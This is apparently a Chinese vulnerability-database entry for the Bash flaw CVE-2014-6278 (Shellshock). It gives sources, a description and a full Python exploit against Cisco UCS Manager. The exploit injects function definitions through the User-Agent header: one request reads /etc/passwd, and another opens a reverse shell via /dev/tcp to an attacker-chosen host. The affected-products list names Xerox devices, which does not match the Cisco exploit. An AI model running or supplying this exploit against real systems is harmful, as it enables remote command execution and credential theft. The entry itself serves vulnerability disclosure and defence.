|漏洞来源
https://www.exploit-db.com/exploits/39568
https://www.securityfocus.com/bid/70166
https://cxsecurity.com/issue/WLB-2016030091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201409-1110
|漏洞详情
GNUBash是美国软件开发者布莱恩-福克斯(BrianJ.Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。GNUBash4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确解析环境变量中的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意命令。以下产品可能受到影响:OpenSSHsshd中的ForceCommand功能,ApacheHTTP服务器中的mod_cgi和mod_cgid模块,DHCP客户端等。(GNU针对CNNVD-201409-938、CNNVD-201409-956和CNNVD-201409-1037所发布的补丁并没有完全修复该漏洞,CNNVD-201409-1110中漏洞依然存在)
|漏洞EXP
#!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ###############################################
import sys
import requests
import time
if len(sys.argv) < 4:
print "\n[] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
print "[] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
print "[]"
print "[] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
print "[*] Listener: nc -lvp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
}
headers2 = {
"User-Agent": '() { test;};echo "Content-type: text/plain"; echo; echo; echo $(</etc/passwd)'
}
def exploit():
try:
r = requests.get(url, headers=headers1, verify=False, timeout=5)
except Exception, e:
if 'timeout' in str(e):
print "[+] Success. Enjoy your shell..."
else:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
def main():
try:
r = requests.get(url, headers=headers2, verify=False, timeout=3)
if r.content.startswith('\nroot:'):
print "[+] Host is vulnerable, spawning shell..."
time.sleep(3)
exploit()
else:
print "[-] Host is not vulnerable, quitting..."
sys.exit()
except Exception, e:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
if name == "main":
main()
|受影响的产品
Xerox WorkCentre 7245 Xerox WorkCentre 7242 Xerox WorkCentre 7238 Xerox WorkCentre 7235 Xerox WorkCentre 7232 Xerox WorkCentre 7228 Xerox Phaser 7800 0
|参考资料
来源:support.novell.com
链接:http://support.novell.com/security/cve/CVE-2014-6278.html
来源:lcamtuf.blogspot.com
链接:http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/show_bug.cgi?id=1147414
来源:SECUNIA
链接:http://secunia.com/advisories/61641
来源:www.suse.com
链接:https://www.suse.com/support/shellshock/
来源:security-tracker.debian.org
链接:https://security-tracker.debian.org/tracker/CVE-2014-6278
来源:kb.bluecoat.com
链接:https://kb.bluecoat.com/index?page=content&;id=SA82
来源:lcamtuf.blogspot.com
链接:http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html